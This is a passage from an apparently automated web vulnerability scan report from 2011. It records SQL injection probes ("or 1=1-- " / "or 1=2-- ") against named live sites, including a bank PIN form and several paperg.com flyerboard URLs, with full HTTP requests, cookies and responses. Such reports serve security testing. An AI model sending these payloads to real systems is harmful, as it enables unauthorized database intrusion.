Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WT_FPC=id=2ac1f5713c1606c63d81305555542668:lv=1305555570806:ss=1305555542668; ASP.NET_SessionId=wm55et55z1a3uoz33gj0wayn; secureapps.regions.com-ssl=R54983192
Content-Length: 3109

__EVENTTARGET=&__EVENTARGUMENT=&DES_Group=FORMINPUT&__VIEWSTATE=xHIh9vjHCP7V7FlwYd0dybomkcrXFi85zGyDNyxO4%2FVfU4gFk56iSPraFK2Fb5m%2FVmSSQkqJSJ9Sd9dg4uCnywmz5oW6bxAuLaWjTNif0yED1YLSSBrlZTehbSWX1peYLbbL
...[SNIP]...
ntPlaceHolder1%24txtATMCheck1=&ctl00%24ContentPlaceHolder1%24txtATMCheck2=&ctl00%24ContentPlaceHolder1%24txtATMCheck3=&ctl00%24ContentPlaceHolder1%24txtATMCheck4=&ctl00%24ContentPlaceHolder1%24txtPin=15752462'%20or%201%3d2--%20&ctl00%24ContentPlaceHolder1%24txtExpirationDate=&ctl00%24ContentPlaceHolder1%24txtCDV=&ctl00%24ContentPlaceHolder1%24btnGetting_StartedContinue.x=30&ctl00%24ContentPlaceHolder1%24btnGetting_StartedCo
...[SNIP]...

Response 2 (redirected)

HTTP/1.1 200 OK
Set-Cookie: secureapps.regions.com-ssl=R54983192; path=/
Cache-Control: no-cache, no-store
Date: Mon, 16 May 2011 15:24:22 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Vary: Accept-Encoding
Content-Length: 10148


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><meta http-equiv="Cont
...[SNIP]...
STATE" id="__VIEWSTATE" value="ejI4XQ0S2loR+l0OfQ1EdYDWVJyr/6vzrIlcFy6iv8O0PXGX0SJfs2E9T7qPj3oS7yMo1fQ3FY1vVGgKbmM9qWeuCfRzvDvha896+i9Q7z+smQNa1zqYtlVwyXOyAhr/EmQZox2KsV02il8iDBCYlzXhyE4KFOtRfKPiQBsp8zB1vg4fXfkHkm3QKlDinaKgiELz7urShH9voX1iKDX/JMW/AUaYpRy9bESpikttIvvWGF3bUtM2TIKJ9kDcWM3YiXiP7d9lPY5yGpbpO+VgPm7yjf0AN2AsqkLGw+PM0amr44+srekoN6ivuT+4acuPt/hE1LR3zsEhC0zD/m8dEWpUqViZC2vWLyZFP3F69ZthRTV2b34E5ob5GKta8QNPFlQiPG10aufAKaWYUdfHdgxPV/TcBhDBh/EI/JHvJfuMSIXXlMXUrw/17vb8px541FATv6MplHUHlY8B2DrmrCsPiHpyOUkuyIzdeuJQGv+3WlgzLDfS3Pron70VaCrf3jc9JzAdJJ3CH3mxJpCc/ZYYjB9df/Fz/aNUbqAUa85JB/jfXOjdhxAhEABPZGzXG83S8wOkP9RJ5CbjpQnFvns8bM/NJg1p4cDYXAO8g88=" />
</div>

<script type="text/javascript">
//<![CDATA[
var theForm = document.forms['aspnetForm'];
if (!theForm) {
theForm = document.aspnetForm;
}
function __doPostBack(eventTarget, eventArgument) {
if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
theForm.__EVENTTARGET.value = eventTarget;
theForm.__EVENTARGUMENT.value = eventArgument;
theForm.submit();
}
}
//]]>
</script>


<input type='hidden' id='DES_JSE' name='DES_JSE' value='' />
<script type='text/javascript'>
//<![CDATA[

var vJDHF = document.getElementById ? document.getElementById('DES_JSE') : (document.all ? document.all['DES_JSE'] : null);
if (vJDHF){vJDHF.value='1';}
//]]>
</script>
<script type='text/javascript' src='/OAO/DESGetFiles.aspx?type=scripts&amp;version=4.0.5.5000&amp;files=0_51_54'></script>

<div>

   <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="vb8s9pKtPLPv5TrDv9mEFfIv+yUfMcdfU3D48j4srjowFk0EaKr3GrgHsPYtfgYcN2OBMWXUzC6Wi3w4yh0eaA==" />
</div>
<div id="page">
<div id="mgMnuTop">
<div class="mnuTopLink">

<a title="Return to Regions.com" onclick="return HandleOnCancel();" target="_parent" href="javascript:__doPostBack('ctl00$ctl10','')">Return to Regions.com</a>
</div>
</div>
<div id="mgLogo">
<img src="https://www.regions.com/virtualMedia/img506.gif" alt="Regions Financial Corporation" />
</div>
<div id="mgBranding">

...[SNIP]...

1.5. http://www.paperg.com/flyerboard/albany-times-union/1552/0.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.paperg.com
Path:   /flyerboard/albany-times-union/1552/0.html

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads 11082331%20or%201%3d1--%20 and 11082331%20or%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /flyerboard/albany-times-union/155211082331%20or%201%3d1--%20/0.html HTTP/1.1
Host: www.paperg.com
Proxy-Connection: keep-alive
Referer: http://www.paperg.com/sitemap/albany-times-union/1552.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=27786045.1704528150.1305557138.1305557138.1305557138.1; __utmc=27786045; __utmz=27786045.1305557138.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=b7octmjd2jmcj47lrmihtort65; __utmb=27786045

Response 1

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 15:21:41 GMT
Server: Apache
X-Powered-By: PHP/5.3.3-7+squeeze1
P3P: CP="CAO PSA OUR"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Connection: Keep-alive
Via: 1.1 AN-0016020122637050
Content-Length: 3772


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN"
   "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en">
<head>

<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

   <title>Flyerboard - NY Daily News</title>

       <meta http-equiv="imagetoolbar" content="false">
   <meta name="MSSmartTagsPreventParsing" content="true">

   <meta name="title" content = "Flyerboard - NY Daily News" />
   
   <meta name="description" content = "NY Daily News NY Daily News Flyerboard, a community bulletin board." />
   
   <link rel="image_src" href="http://www.paperg.com/beta/user/4/logo.gif" />

   <!--[if IE]>
   <link rel="stylesheet" type="text/css" href="/inc/ie.css">
   <![endif]-->
   <!--[if IE 6]>
   <link rel="stylesheet" type="text/css" href="/inc/style_no_colors_ie6.css" />
   <![endif]-->

   <style type="text/css">
       label {
           width: 70px;
           margin-right: 5px;
           text-align: 5px;
       }
       form {
           text-align: center;
       }



form#filters label {
display: block;
padding-top: 10px;
}
form#filters {
float: right;
width: 190px;
padding-top: 5px;
display: block;
text-align: left;
}

   </style>
   <link rel="stylesheet" type="text/css" href="https://www.paperg.com/inc/style_no_colors.css" media="all">
<link id="favicon" rel="icon" type="image/gif" href="icon.gif">
   <link rel="stylesheet" type="text/css" href="http://www.paperg.com/https/skin/csscache/0.css?version=18" media="screen"><base target=_top>
</head>
<body class="smaller">
   <!-- START : BACKGROUND BAR -->
   <div id="background_bar_container">
       <div id="background_bar">&nbsp;</div>
   </div>
   <!-- END : BACKGROUND BAR -->

   
   <div id="body-wrap">
       <!-- START: HEADER -->
       <div id="header">
           <a href="https://www.paperg.com" target="_blank" rel="nofollow" ><div
...[SNIP]...

Request 2

GET /flyerboard/albany-times-union/155211082331%20or%201%3d2--%20/0.html HTTP/1.1
Host: www.paperg.com
Proxy-Connection: keep-alive
Referer: http://www.paperg.com/sitemap/albany-times-union/1552.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=27786045.1704528150.1305557138.1305557138.1305557138.1; __utmc=27786045; __utmz=27786045.1305557138.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=b7octmjd2jmcj47lrmihtort65; __utmb=27786045

Response 2

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 15:21:42 GMT
Server: Apache
X-Powered-By: PHP/5.3.3-7+squeeze1
P3P: CP="CAO PSA OUR"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Connection: Keep-alive
Via: 1.1 AN-0016020122637050
Content-Length: 1



1.6. http://www.paperg.com/flyerboard/app.com/1992/0.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.paperg.com
Path:   /flyerboard/app.com/1992/0.html

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads 89983410%20or%201%3d1--%20 and 89983410%20or%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /flyerboard/app.com/199289983410%20or%201%3d1--%20/0.html HTTP/1.1
Host: www.paperg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1305557438.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=shsfh547e8d0bgd8n3cvu8a1g6; __utma=1.327532980.1305557438.1305557438.1305557438.1; __utmc=1; __utmb=1.1.10.1305557438;

Response 1

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 15:20:23 GMT
Server: Apache
X-Powered-By: PHP/5.3.3-7+squeeze1
P3P: CP="CAO PSA OUR"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 3772
Connection: close
Via: 1.1 AN-0016020122637050


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN"
   "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en">
<head>

<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

   <title>Flyerboard - NY Daily News</title>

       <meta http-equiv="imagetoolbar" content="false">
   <meta name="MSSmartTagsPreventParsing" content="true">

   <meta name="title" content = "Flyerboard - NY Daily News" />
   
   <meta name="description" content = "NY Daily News NY Daily News Flyerboard, a community bulletin board." />
   
   <link rel="image_src" href="http://www.paperg.com/beta/user/4/logo.gif" />

   <!--[if IE]>
   <link rel="stylesheet" type="text/css" href="/inc/ie.css">
   <![endif]-->
   <!--[if IE 6]>
   <link rel="stylesheet" type="text/css" href="/inc/style_no_colors_ie6.css" />
   <![endif]-->

   <style type="text/css">
       label {
           width: 70px;
           margin-right: 5px;
           text-align: 5px;
       }
       form {
           text-align: center;
       }



form#filters label {
display: block;
padding-top: 10px;
}
form#filters {
float: right;
width: 190px;
padding-top: 5px;
display: block;
text-align: left;
}

   </style>
   <link rel="stylesheet" type="text/css" href="https://www.paperg.com/inc/style_no_colors.css" media="all">
<link id="favicon" rel="icon" type="image/gif" href="icon.gif">
   <link rel="stylesheet" type="text/css" href="http://www.paperg.com/https/skin/csscache/0.css?version=18" media="screen"><base target=_top>
</head>
<body class="smaller">
   <!-- START : BACKGROUND BAR -->
   <div id="background_bar_container">
       <div id="background_bar">&nbsp;</div>
   </div>
   <!-- END : BACKGROUND BAR -->

   
   <div id="body-wrap">
       <!-- START: HEADER -->
       <div id="header">
           <a href="https://www.paperg.com" target="_blank" rel="nofollow" ><div
...[SNIP]...

Request 2

GET /flyerboard/app.com/199289983410%20or%201%3d2--%20/0.html HTTP/1.1
Host: www.paperg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1305557438.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=shsfh547e8d0bgd8n3cvu8a1g6; __utma=1.327532980.1305557438.1305557438.1305557438.1; __utmc=1; __utmb=1.1.10.1305557438;

Response 2

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 15:20:23 GMT
Server: Apache
X-Powered-By: PHP/5.3.3-7+squeeze1
P3P: CP="CAO PSA OUR"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 1
Connection: close
Via: 1.1 AN-0016020122637050



1.7. http://www.paperg.com/flyerboard/code-enforcement-officer/3017/30085.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.paperg.com
Path:   /flyerboard/code-enforcement-officer/3017/30085.html

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads 16183801%20or%201%3d1--%20 and 16183801%20or%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /flyerboard/code-enforcement-officer/301716183801%20or%201%3d1--%20/30085.html HTTP/1.1
Host: www.paperg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1305557438.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=shsfh547e8d0bgd8n3cvu8a1g6; __utma=1.327532980.1305557438.1305557438.1305557438.1; __utmc=1; __utmb=1.1.10.1305557438;

Response 1

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 15:18:38 GMT
Server: Apache
X-Powered-By: PHP/5.3.3-7+squeeze1
P3P: CP="CAO PSA OUR"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 3963
Connection: close
Via: 1.1 AN-0016020122637050


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN"
   "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en">
<head>

<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

   <title>Flyerboard - CODE ENFORCEMENT OFFICER - NY Daily News</title>

       <meta http-equiv="imagetoolbar" content="false">
   <meta name="MSSmartTagsPreventParsing" content="true">

   <meta name="title" content = "CODE ENFORCEMENT OFFICER" />
   
   <meta name="description" content = "" />
   
   <link rel="image_src" href="http://www.paperg.com/beta/user/13905/0ad___162541.jpg" />

   <!--[if IE]>
   <link rel="stylesheet" type="text/css" href="/inc/ie.css">
   <![endif]-->
   <!--[if IE 6]>
   <link rel="stylesheet" type="text/css" href="/inc/style_no_colors_ie6.css" />
   <![endif]-->

   <style type="text/css">
       label {
           width: 70px;
           margin-right: 5px;
           text-align: 5px;
       }
       form {
           text-align: center;
       }



form#filters label {
display: block;
padding-top: 10px;
}
form#filters {
float: right;
width: 190px;
padding-top: 5px;
display: block;
text-align: left;
}

   </style>
   <link rel="stylesheet" type="text/css" href="https://www.paperg.com/inc/style_no_colors.css" media="all">
<link id="favicon" rel="icon" type="image/gif" href="icon.gif">
   <link rel="stylesheet" type="text/css" href="http://www.paperg.com/https/skin/csscache/0.css?version=18" media="screen"><base target=_top>
</head>
<body class="smaller">
   <!-- START : BACKGROUND BAR -->
   <div id="background_bar_container">
       <div id="background_bar">&nbsp;</div>
   </div>
   <!-- END : BACKGROUND BAR -->

   
   <div id="body-wrap">
       <!-- START: HEADER -->
       <div id="header">
           <a href="https://www.paperg.com" target="_blank" rel="nofollow" ><div id="sponsor_logo"></div></a>
...[SNIP]...

Request 2

GET /flyerboard/code-enforcement-officer/301716183801%20or%201%3d2--%20/30085.html HTTP/1.1
Host: www.paperg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1305557438.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=shsfh547e8d0bgd8n3cvu8a1g6; __utma=1.327532980.1305557438.1305557438.1305557438.1; __utmc=1; __utmb=1.1.10.1305557438;

Response 2

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 15:18:39 GMT
Server: Apache
X-Powered-By: PHP/5.3.3-7+squeeze1
P3P: CP="CAO PSA OUR"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 1
Connection: close
Via: 1.1 AN-0016020122637050



1.8. http://www.paperg.com/flyerboard/code-enforcement-officer/3023/30085.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.paperg.com
Path:   /flyerboard/code-enforcement-officer/3023/30085.html

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads 10005404%20or%201%3d1--%20 and 10005404%20or%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /flyerboard/code-enforcement-officer/302310005404%20or%201%3d1--%20/30085.html HTTP/1.1
Host: www.paperg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1305557438.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=shsfh547e8d0bgd8n3cvu8a1g6; __utma=1.327532980.1305557438.1305557438.1305557438.1; __utmc=1; __utmb=1.1.10.1305557438;

Response 1

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 15:19:11 GMT
Server: Apache
X-Powered-By: PHP/5.3.3-7+squeeze1
P3P: CP="CAO PSA OUR"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 3963
Connection: close
Via: 1.1 AN-0016020122637050


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN"
   "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en">
<head>

<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

   <title>Flyerboard - CODE ENFORCEMENT OFFICER - NY Daily News</title>

       <meta http-equiv="imagetoolbar" content="false">
   <meta name="MSSmartTagsPreventParsing" content="true">

   <meta name="title" content = "CODE ENFORCEMENT OFFICER" />
   
   <meta name="description" content = "" />
   
   <link rel="image_src" href="http://www.paperg.com/beta/user/13905/0ad___162541.jpg" />

   <!--[if IE]>
   <link rel="stylesheet" type="text/css" href="/inc/ie.css">
   <![endif]-->
   <!--[if IE 6]>
   <link rel="stylesheet" type="text/css" href="/inc/style_no_colors_ie6.css" />
   <![endif]-->

   <style type="text/css">
       label {
           width: 70px;
           margin-right: 5px;
           text-align: 5px;
       }
       form {
           text-align: center;
       }



form#filters label {
display: block;
padding-top: 10px;
}
form#filters {
float: right;
width: 190px;
padding-top: 5px;
display: block;
text-align: left;
}

   </style>
   <link rel="stylesheet" type="text/css" href="https://www.paperg.com/inc/style_no_colors.css" media="all">
<link id="favicon" rel="icon" type="image/gif" href="icon.gif">
   <link rel="stylesheet" type="text/css" href="http://www.paperg.com/https/skin/csscache/0.css?version=18" media="screen"><base target=_top>
</head>
<body class="smaller">
   <!-- START : BACKGROUND BAR -->
   <div id="background_bar_container">
       <div id="background_bar">&nbsp;</div>
   </div>
   <!-- END : BACKGROUND BAR -->

   
   <div id="body-wrap">
       <!-- START: HEADER -->
       <div id="header">
           <a href="https://www.paperg.com" target="_blank" rel="nofollow" ><div id="sponsor_logo"></div></a>
...[SNIP]...

Request 2

GET /flyerboard/code-enforcement-officer/302310005404%20or%201%3d2--%20/30085.html HTTP/1.1
Host: www.paperg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1305557438.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=shsfh547e8d0bgd8n3cvu8a1g6; __utma=1.327532980.1305557438.1305557438.1305557438.1; __utmc=1; __utmb=1.1.10.1305557438;

Response 2

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 15:19:11 GMT
Server: Apache
X-Powered-By: PHP/5.3.3-7+squeeze1
P3P: CP="CAO PSA OUR"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 1
Connection: close
Via: 1.1 AN-0016020122637050



1.9. http://www.paperg.com/flyerboard/conifer-park/1552/45966.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.paperg.com
Path:   /flyerboard/conifer-park/1552/45966.html

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads 25402272%20or%201%3d1--%20 and 25402272%20or%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /flyerboard/conifer-park/155225402272%20or%201%3d1--%20/45966.html HTTP/1.1
Host: www.paperg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1305557438.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=shsfh547e8d0bgd8n3cvu8a1g6; __utma=1.327532980.1305557438.1305557438.1305557438.1; __utmc=1; __utmb=1.1.10.1305557438;

Response 1

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 15:20:33 GMT
Server: Apache
X-Powered-By: PHP/5.3.3-7+squeeze1
P3P: CP="CAO PSA OUR"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 3877
Connection: close
Via: 1.1 AN-0016020122637050


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN"
   "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en">
<head>

<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

   <title>Flyerboard - Conifer Park - NY Daily News</title>

       <meta http-equiv="imagetoolbar" content="false">
   <meta name="MSSmartTagsPreventParsing" content="true">

   <meta name="title" content = "Conifer Park" />
   
   <meta name="description" content = "" />
   
   <link rel="image_src" href="http://www.paperg.com/beta/user/4706/3conifer130513272445966.jpg" />

   <!--[if IE]>
   <link rel="stylesheet" type="text/css" href="/inc/ie.css">
   <![endif]-->
   <!--[if IE 6]>
   <link rel="stylesheet" type="text/css" href="/inc/style_no_colors_ie6.css" />
   <![endif]-->

   <style type="text/css">
       label {
           width: 70px;
           margin-right: 5px;
           text-align: 5px;
       }
       form {
           text-align: center;
       }



form#filters label {
display: block;
padding-top: 10px;
}
form#filters {
float: right;
width: 190px;
padding-top: 5px;
display: block;
text-align: left;
}

   </style>
   <link rel="stylesheet" type="text/css" href="https://www.paperg.com/inc/style_no_colors.css" media="all">
<link id="favicon" rel="icon" type="image/gif" href="icon.gif">
   <link rel="stylesheet" type="text/css" href="http://www.paperg.com/https/skin/csscache/0.css?version=18" media="screen"><base target=_top>
</head>
<body class="smaller">
   <!-- START : BACKGROUND BAR -->
   <div id="background_bar_container">
       <div id="background_bar">&nbsp;</div>
   </div>
   <!-- END : BACKGROUND BAR -->

   
   <div id="body-wrap">
       <!-- START: HEADER -->
       <div id="header">
           <a href="https://www.paperg.com" target="_blank" rel="nofollow" ><div id="sponsor_logo"></div></a>
       </div>        
   
...[SNIP]...

Request 2

GET /flyerboard/conifer-park/155225402272%20or%201%3d2--%20/45966.html HTTP/1.1
Host: www.paperg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1305557438.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=shsfh547e8d0bgd8n3cvu8a1g6; __utma=1.327532980.1305557438.1305557438.1305557438.1; __utmc=1; __utmb=1.1.10.1305557438;

Response 2

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 15:20:34 GMT
Server: Apache
X-Powered-By: PHP/5.3.3-7+squeeze1
P3P: CP="CAO PSA OUR"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 1
Connection: close
Via: 1.1 AN-0016020122637050



1.10. http://www.paperg.com/flyerboard/conifer-park/1753/45966.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.paperg.com
Path:   /flyerboard/conifer-park/1753/45966.html

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads 14633334%20or%201%3d1--%20 and 14633334%20or%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /flyerboard/conifer-park/175314633334%20or%201%3d1--%20/45966.html HTTP/1.1
Host: www.paperg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1305557438.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=shsfh547e8d0bgd8n3cvu8a1g6; __utma=1.327532980.1305557438.1305557438.1305557438.1; __utmc=1; __utmb=1.1.10.1305557438;

Response 1

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 15:20:32 GMT
Server: Apache
X-Powered-By: PHP/5.3.3-7+squeeze1
P3P: CP="CAO PSA OUR"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 3877
Connection: close
Via: 1.1 AN-0016020122637050


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN"
   "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en">
<head>

<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

   <title>Flyerboard - Conifer Park - NY Daily News</title>

       <meta http-equiv="imagetoolbar" content="false">
   <meta name="MSSmartTagsPreventParsing" content="true">

   <meta name="title" content = "Conifer Park" />
   
   <meta name="description" content = "" />
   
   <link rel="image_src" href="http://www.paperg.com/beta/user/4706/3conifer130513272445966.jpg" />

   <!--[if IE]>
   <link rel="stylesheet" type="text/css" href="/inc/ie.css">
   <![endif]-->
   <!--[if IE 6]>
   <link rel="stylesheet" type="text/css" href="/inc/style_no_colors_ie6.css" />
   <![endif]-->

   <style type="text/css">
       label {
           width: 70px;
           margin-right: 5px;
           text-align: 5px;
       }
       form {
           text-align: center;
       }



form#filters label {
display: block;
padding-top: 10px;
}
form#filters {
float: right;
width: 190px;
padding-top: 5px;
display: block;
text-align: left;
}

   </style>
   <link rel="stylesheet" type="text/css" href="https://www.paperg.com/inc/style_no_colors.css" media="all">
<link id="favicon" rel="icon" type="image/gif" href="icon.gif">
   <link rel="stylesheet" type="text/css" href="http://www.paperg.com/https/skin/csscache/0.css?version=18" media="screen"><base target=_top>
</head>
<body class="smaller">
   <!-- START : BACKGROUND BAR -->
   <div id="background_bar_container">
       <div id="background_bar">&nbsp;</div>
   </div>
   <!-- END : BACKGROUND BAR -->

   
   <div id="body-wrap">
       <!-- START: HEADER -->
       <div id="header">
